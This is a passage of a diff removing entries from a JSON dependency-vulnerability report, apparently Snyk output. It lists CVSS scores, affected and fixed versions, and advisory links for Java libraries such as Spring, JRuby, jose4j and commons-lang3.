-          "2.2.30.Final",
-          "2.3.11.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-11-18T19:58:47.813113Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-11-18T19:58:47.758525Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/ea7ea2525d9acad0fcf8f3dfd4972f91394796ee"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/f72b2ef8114ad11bf9add501f3fae0f7bbd12128"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2166022"
-          },
-          {
-            "title": "Red Hat Issues",
-            "url": "https://issues.redhat.com/browse/UNDERTOW-2342"
-          }
-        ],
-        "severity": "critical",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGAPACHECOMMONS-10734078": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[3.0, 3.18.0)"
-        ],
-        "created_at": "2025-07-13T07:58:53.086065Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 8.8,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.8,
-            "cvss_version": "4.0",
-            "modified_at": "2025-07-13T09:08:38.850906Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 8.2,
-            "cvss_version": "3.1",
-            "modified_at": "2025-07-13T09:08:38.850906Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 3.7,
-            "cvss_version": "3.1",
-            "modified_at": "2025-07-12T06:33:52.830274Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 4.7,
-            "cvss_version": "3.1",
-            "modified_at": "2025-08-14T11:02:13.905724Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N",
-        "disclosed_at": "2025-07-11T15:31:37Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.19101",
-          "probability": "0.00061"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
-        "initially_fixed_in_versions": [
-          "3.18.0"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-08-14T11:02:13.905724Z",
-        "package_name": "org.apache.commons:commons-lang3",
-        "package_version": "",
-        "published_at": "2025-07-13T09:08:38.832136Z",
-        "references": [
-          {
-            "title": "Apache Pony Mail",
-            "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGBITBUCKETBC-6139942": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,0.9.4)"
-        ],
-        "created_at": "2023-12-27T12:57:23.732781Z",
-        "credits": [
-          "Jesse Yang"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:35.037702Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-05-09T13:33:06.434226Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
-        "disclosed_at": "2023-12-25T22:44:43Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.54206",
-          "probability": "0.00316"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGBITBUCKETBC-6139942",
-        "initially_fixed_in_versions": [
-          "0.9.4"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-05-09T13:33:06.434226Z",
-        "package_name": "org.bitbucket.b_c:jose4j",
-        "package_version": "",
-        "published_at": "2023-12-27T13:04:53.433191Z",
-        "references": [
-          {
-            "title": "Bitbucket Commit",
-            "url": "https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3"
-          },
-          {
-            "title": "Bitbucket Issue",
-            "url": "https://bitbucket.org/b_c/jose4j/issues/212"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGJBOSSXNIO-6403375": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,3.5.10)",
-          "[3.6.0.Beta1,3.7.13)",
-          "[3.8.0,3.8.14)"
-        ],
-        "created_at": "2024-03-06T14:54:57.557703Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-09-08T14:00:34.129256Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-27T13:45:18.043553Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-        "disclosed_at": "2024-03-05T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.58905",
-          "probability": "0.00383"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375",
-        "initially_fixed_in_versions": [
-          "3.5.10",
-          "3.7.13",
-          "3.8.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-09-08T14:00:34.129256Z",
-        "package_name": "org.jboss.xnio:xnio-api",
-        "package_version": "",
-        "published_at": "2024-03-07T06:05:43.05231Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1"
-          },
-          {
-            "title": "RedHat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241822"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGJRUBY-10074039": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[9.3.4.0,9.4.12.1)",
-          "[10.0.0.0,10.0.0.1)"
-        ],
-        "created_at": "2025-05-08T08:57:26.220648Z",
-        "credits": [
-          "Mohamed Hafez"
-        ],
-        "cvss_base_score": 6,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6,
-            "cvss_version": "4.0",
-            "modified_at": "2025-05-08T12:09:12.338213Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2025-05-08T12:09:12.338213Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 3.7,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-22T01:13:33.859718Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-05-08T15:09:11.348423Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2025-05-07T17:32:54Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.05622",
-          "probability": "0.00025"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGJRUBY-10074039",
-        "initially_fixed_in_versions": [
-          "9.4.12.1",
-          "10.0.0.1"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-22T01:13:33.859718Z",
-        "package_name": "org.jruby:jruby",
-        "package_version": "",
-        "published_at": "2025-05-08T12:09:12.327977Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/jruby/jruby-openssl/commit/b1fc5d645c0d90891b8865925ac1c15e3f15a055"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGJRUBY-10557729": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,9.4.13.0)",
-          "[10.0.0.0,]"
-        ],
-        "created_at": "2025-06-27T12:44:09.940948Z",
-        "credits": [
-          "Masamune"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "4.0",
-            "modified_at": "2025-06-27T12:44:10.227685Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-06-27T12:44:10.227685Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-05-13T01:13:47.511048Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-29T14:04:00.892127Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
-        "disclosed_at": "2025-04-28T16:02:04Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.35880",
-          "probability": "0.00148"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGJRUBY-10557729",
-        "initially_fixed_in_versions": [],
-        "is_fixable": false,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-06-27T12:44:10.227685Z",
-        "package_name": "org.jruby:jruby-stdlib",
-        "package_version": "",
-        "published_at": "2025-06-27T12:44:10.216989Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105%23diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/ruby/net-imap/pull/442"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/ruby/net-imap/pull/445"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/ruby/net-imap/pull/446"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/ruby/net-imap/pull/447"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2362749"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-10345766": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.0.5,6.1.21)",
-          "[6.2.0,6.2.8)"
-        ],
-        "created_at": "2025-06-13T08:22:30.160142Z",
-        "credits": [
-          "Jakob Linskeseder"
-        ],
-        "cvss_base_score": 4.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 4.5,
-            "cvss_version": "4.0",
-            "modified_at": "2025-06-13T08:22:30.472203Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-06-13T08:22:30.472203Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-06-13T05:28:30.837098Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N",
-        "disclosed_at": "2025-06-12T21:50:47.29Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.26829",
-          "probability": "0.00093"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-10345766",
-        "initially_fixed_in_versions": [
-          "6.1.21",
-          "6.2.8"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-06-13T08:22:30.472203Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2025-06-13T08:22:30.441155Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/f0e7b42704e6b33958f242d91bd690d6ef7ada9c"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/spring-projects/spring-framework/issues/35034"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2025-41234"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-12008931": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.2.10)"
-        ],
-        "created_at": "2025-08-19T08:14:28.809726Z",
-        "credits": [
-          "1ue",
-          "iSafeBlue",
-          "Joakim Erdfelt"
-        ],
-        "cvss_base_score": 8.2,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.2,
-            "cvss_version": "4.0",
-            "modified_at": "2025-08-19T08:15:12.258842Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2025-08-19T08:15:12.258842Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2025-08-19T17:29:27.431619Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2025-08-14T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.26363",
-          "probability": "0.00090"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12008931",
-        "initially_fixed_in_versions": [
-          "6.2.10"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-08-19T17:29:27.431619Z",
-        "package_name": "org.springframework:spring-beans",
-        "package_version": "",
-        "published_at": "2025-08-19T08:14:29.077518Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/3781ba223ed76823b99e9c699e0957b391e22bf9"
-          },
-          {
-            "title": "GitHub Release",
-            "url": "https://github.com/spring-projects/spring-framework/releases/tag/v6.2.10"
-          },
-          {
-            "title": "Spring Release",
-            "url": "https://spring.io/blog/2025/08/14/spring-framework-6-2-10-release-fixes-cve-2025-41242"
-          },
-          {
-            "title": "Vendor Advisory",
-            "url": "https://spring.io/security/cve-2025-41242"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-12817817": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.2.11)"
-        ],
-        "created_at": "2025-09-17T08:55:00.300239Z",
-        "credits": [
-          "Sam Brannen"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2025-09-17T21:24:40.48434Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-09-17T21:24:40.48434Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-09-18T13:36:04.157972Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2025-09-16T15:32:34Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.17523",
-          "probability": "0.00056"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12817817",
-        "initially_fixed_in_versions": [
-          "6.2.11"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-09-18T13:36:04.157972Z",
-        "package_name": "org.springframework:spring-core",
-        "package_version": "",
-        "published_at": "2025-09-17T21:24:40.464102Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/6d710d482a6785b069e35022e81758953afc21ff"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/spring-projects/spring-framework/issues/35342"
-          },
-          {
-            "title": "GitHub Release",
-            "url": "https://github.com/spring-projects/spring-framework/releases/tag/v6.2.11"
-          },
-          {
-            "title": "Vendor Advisory",
-            "url": "https://spring.io/security/cve-2025-41249"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-6091650": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.0.0,6.0.14)"
-        ],
-        "created_at": "2023-11-28T13:29:37.489032Z",
-        "credits": [
-          "James Yuzawa"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:22.527936Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.730706Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
-        "disclosed_at": "2023-11-27T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.62947",
-          "probability": "0.00453"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6091650",
-        "initially_fixed_in_versions": [
-          "6.0.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:54:08.730706Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2023-11-28T13:34:07.590597Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/c18784678df489d06a70e54fcddb5e3821d4b00c"
-          },
-          {
-            "title": "Vulnerability Advisory",
-            "url": "https://spring.io/security/cve-2023-34053"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.3.32)",
-          "[6.0.0,6.0.17)",
-          "[6.1.0,6.1.4)"
-        ],
-        "created_at": "2024-02-22T09:39:25.202849Z",
-        "credits": [
-          "Sean Pesce"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-10T17:13:38.691448Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/E:P"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/E:P",
-        "disclosed_at": "2024-02-21T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.97595",
-          "probability": "0.48232"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586",
-        "initially_fixed_in_versions": [
-          "5.3.32",
-          "6.0.17",
-          "6.1.4"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-11-10T17:13:38.691448Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2024-02-22T15:48:30.525565Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/SeanPesce/CVE-2024-22243"
-          },
-          {
-            "title": "Spring Advisory",
-            "url": "https://spring.io/security/cve-2024-22243"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.3.33)",
-          "[6.0.0, 6.0.18)",
-          "[6.1.0, 6.1.5)"
-        ],
-        "created_at": "2024-03-15T10:11:04.950943Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 7.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-07-02T15:25:03.250566Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-17T13:32:42.716493Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
-        "disclosed_at": "2024-03-14T00:00:00Z",
